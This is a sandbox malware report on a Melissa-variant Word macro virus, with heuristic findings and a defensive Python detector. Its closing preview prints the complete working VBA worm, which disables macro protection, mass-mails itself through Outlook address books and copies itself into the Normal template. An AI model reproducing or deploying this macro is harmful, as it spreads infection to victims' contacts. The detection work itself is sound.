MALICIOUS
Risk Score: 290
Heuristics: 7

- ClamAV: Doc.Trojan.Melissa-23 (critical, CLAMAV_DETECTION)
  ClamAV detected this file as malware: Doc.Trojan.Melissa-23
- VBA macros detected (medium, OLE_VBA_MACROS; 4 related findings)
  Document contains VBA macro code.
- VBA macro-virus self-replication / AV tampering (critical, OLE_VBA_MACRO_VIRUS_REPLICATION)
  The VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents with InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature. In this sample the False is written as the arithmetic expression `(3 - 3)` (see the preview script below), so a pattern that looks for the literal `False` would miss it; the VBE object-model calls are the more robust indicator.
  Matched line in script: `If ADCL > 0 Then _ ADI1.CodeModule.DeleteLines 1, ADCL Set ToI = ADI1`
- CreateObject call (high, OLE_VBA_CREATEOBJ)
  Matched line in script: `Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice Set UngaDasOutlook = CreateObject(h$) Set DasMapiName = UngaDasOutlook.GetNameSpace(j$)`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
  Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Document_Open macro (low, OLE_VBA_DOCOPEN)
  Matched line in script: `Attribute VB_Customizable = True Private Sub Document_Open() a$ = ""`
- Embedded URL (info, EMBEDDED_URL)
  One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://compagniedeslucioles.free.fr (in document text, OLE body)
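The two VBA heuristics above, the auto-exec/execution-token pairing and the VBE self-replication / AV-tampering check, can be reproduced over the decoded source that olevba extracts (the macros.bas artifact below). The following is an added example written for this page, not the analyzer's own implementation; the rule names, severities, and the two constructed inputs (an excerpt of this sample's macro and a benign macro) are assumptions. It also handles two details a naive grep gets wrong: VBA `_` line continuations, and the `(3 - 3)` spelling of False that this sample uses for `Options.VirusProtection`.

```python
import re

# Token lists copied from the rule descriptions in the report above.
AUTOEXEC = ("Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open",
            "Auto_Close", "AutoClose")
EXEC_TOKENS = ("Shell", "CreateObject", "GetObject", "PowerShell", "cmd.exe",
               "URLDownloadToFile", "WinHttp", "XMLHTTP", "ADODB.Stream",
               "ShellExecute", "ExecuteExcel4Macro")
VBE_CONTAINERS = ("CodeModule", "VBComponents")
VBE_WRITERS = ("InsertLines", "DeleteLines", "AddFromString", "OrganizerCopy")

_STRING_LITERAL = re.compile(r'"(?:[^"]|"")*"')


def normalize_vba(src: str) -> str:
    """Join `_` line continuations and blank out string literals, so that a
    token that only occurs inside a quoted string (this sample stores
    "Private Sub Document_Close()" in q$) is not counted as code."""
    joined = re.sub(r"[ \t]+_\r?\n", " ", src)
    return _STRING_LITERAL.sub('""', joined)


def find_tokens(code: str, tokens) -> list:
    """Case-insensitive whole-word search (VBA identifiers are case-insensitive)."""
    return sorted(t for t in tokens
                  if re.search(r"\b%s\b" % re.escape(t), code, re.IGNORECASE))


def scan_vba(src: str) -> list:
    """Return (rule, severity, evidence) tuples. Rule names and severities are
    this example's own, modelled on the report, not the analyzer's identifiers."""
    code = normalize_vba(src)
    findings = []

    # Pairing rule: an entry point AND an execution token; neither alone fires.
    autoexec = find_tokens(code, AUTOEXEC)
    execs = find_tokens(code, EXEC_TOKENS)
    if autoexec and execs:
        findings.append(("AUTOEXEC_EXEC", "high", autoexec + execs))

    # Self-replication: a VBE container object together with a code-writing call.
    containers = find_tokens(code, VBE_CONTAINERS)
    writers = find_tokens(code, VBE_WRITERS)
    if containers and writers:
        findings.append(("MACRO_VIRUS_REPLICATION", "critical", containers + writers))

    # AV tampering: any assignment to Options.VirusProtection. The right-hand
    # side is deliberately not compared with the literal False, because the
    # sample writes it as (3 - 3); the assignment itself is the signal.
    m = re.search(r"\bOptions\.VirusProtection\s*=\s*([^:\n]+)", code, re.IGNORECASE)
    if m:
        findings.append(("AV_TAMPERING", "critical", [m.group(1).strip()]))
    return findings


# Constructed inputs: an excerpt of the preview script on this page, and a
# benign macro whose only suspicious words sit inside a string literal.
SAMPLE_MACRO = '''Private Sub Document_Open()
q$ = "Private Sub Document_Close()"
h$ = "Outlook" + ".Application"
Options.ConfirmConversions = (3 - 3): Options.VirusProtection = (3 - 3): Options.SaveNormalPrompt = (3 - 3)
Set UngaDasOutlook = CreateObject(h$)
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
ToI.CodeModule.AddFromString (q$)
End Sub
'''

BENIGN_MACRO = '''Sub FormatReport()
    Dim note As String
    note = "Workbook_Open and Shell are just words in this string"
    ActiveDocument.Paragraphs(1).Range.Font.Bold = True
End Sub
'''

if __name__ == "__main__":
    for name, src in (("sample", SAMPLE_MACRO), ("benign", BENIGN_MACRO)):
        print(name, scan_vba(src))
```

Running it against the full macros.bas (for example the output of `olevba --decode` on the sample) yields the same three findings; on the benign macro it yields none, and a macro with only `Document_Open` or only `Shell` is correctly not flagged by the pairing rule.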
Extracted artifacts: 1
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 3420 bytes |

macros.bas
SHA-256: b37a513b6e6359703e4ff6262af1bc1a0f0d9ee1668846e3f4d5aed2c93c41e4
Detection (ClamAV): Doc.Trojan.Melissa-15 (note that the container file itself matched a different signature, Doc.Trojan.Melissa-23, in the findings above)
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
```vb
Attribute VB_Name = "x"
Attribute VB_Base = "1Normal.x"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
    a$ = ""
    hk1$ = "HKEY_CURRENT_USER"
    sec1$ = "Security"
    smo$ = "\Software\Microsoft\Office"
    b$ = hk1$ + smo$ + "\9.0\Word\" + sec1$
    c$ = "Level"
    d$ = sec1$ + "..."
    e$ = "Macro"
    g$ = "Tools"
    ot1$ = "Outlook"
    h$ = ot1$ + ".Application"
    k$ = hk1$ + smo$ + "\"
    nam$ = "x"
    i$ = nam$ + "?"
    aut$ = "y"
    j$ = "MAPI"
    l$ = "profile"
    m$ = "password"
    n$ = "Duhalde Presidente "
    o$ = "Programa de gobierno 1999 - 2004."
    p$ = hk1$ + smo$ + "\"
    q$ = "Private Sub Document_Close()"
    r$ = "Private Sub Document_Open()"
    s$ = "Document"
    t$ = " "
    On Error Resume Next
    If System.PrivateProfileString(a$, b$, c$) <> a$ Then
        CommandBars(e$).Controls(d$).Enabled = False
        System.PrivateProfileString(a$, b$, c$) = 1&
    Else
        CommandBars(g$).Controls(e$).Enabled = False
        Options.ConfirmConversions = (3 - 3): Options.VirusProtection = (3 - 3): Options.SaveNormalPrompt = (3 - 3)
    End If
    Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
    Set UngaDasOutlook = CreateObject(h$)
    Set DasMapiName = UngaDasOutlook.GetNameSpace(j$)
    If System.PrivateProfileString(a$, k$, i$) <> aut$ Then
        If UngaDasOutlook = ot1$ Then
            DasMapiName.Logon l$, m$
            For y = 1 To DasMapiName.AddressLists.Count
                Set AddyBook = DasMapiName.AddressLists(y)
                x1 = 1
                Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
                For oo = 1 To AddyBook.AddressEntries.Count
                    Peep = AddyBook.AddressEntries(x1)
                    BreakUmOffASlice.Recipients.Add Peep
                    x1 = x1 + 1
                    If x1 > 100 Then oo = AddyBook.AddressEntries.Count
                Next oo
                BreakUmOffASlice.Subject = n$ & Application.UserName
                BreakUmOffASlice.Body = o$
                BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
                BreakUmOffASlice.Send
                Peep = a$
            Next y
            DasMapiName.Logoff
        End If
        System.PrivateProfileString(a$, p$, i$) = aut$
    End If
    Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
    Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
    NTCL = NTI1.CodeModule.CountOfLines
    ADCL = ADI1.CodeModule.CountOfLines
    BGN = 2
    If ADI1.Name <> nam$ Then
        If ADCL > 0 Then _
            ADI1.CodeModule.DeleteLines 1, ADCL
        Set ToI = ADI1
        ADI1.Name = nam$
        DoAD = True
    End If
    If NTI1.Name <> nam$ Then
        If NTCL > 0 Then _
            NTI1.CodeModule.DeleteLines 1, NTCL
        Set ToI = NTI1
        NTI1.Name = nam$
        DoNT = True
    End If
    If DoNT <> True And DoAD <> True Then GoTo CYA
    If DoNT = True Then
        Do While ADI1.CodeModule.Lines(1, 1) = a$
            ADI1.CodeModule.DeleteLines 1
        Loop
        ToI.CodeModule.AddFromString (q$)
        Do While ADI1.CodeModule.Lines(BGN, 1) <> a$
            ToI.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
            BGN = BGN + 1
        Loop
    End If
    If DoAD = True Then
        Do While NTI1.CodeModule.Lines(1, 1) = a$
            NTI1.CodeModule.DeleteLines 1
        Loop
        ToI.CodeModule.AddFromString (r$)
        Do While NTI1.CodeModule.Lines(BGN, 1) <> a$
            ToI.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
            BGN = BGN + 1
        Loop
    End If
CYA:
    If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, s$) = False) Then
        ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
    ElseIf (InStr(1, ActiveDocument.Name, s$) <> False) Then
        ActiveDocument.Saved = True: End If
    If (Day(Now) + 1) = (Minute(Now) + 2) Then Selection.TypeText t$
End Sub
```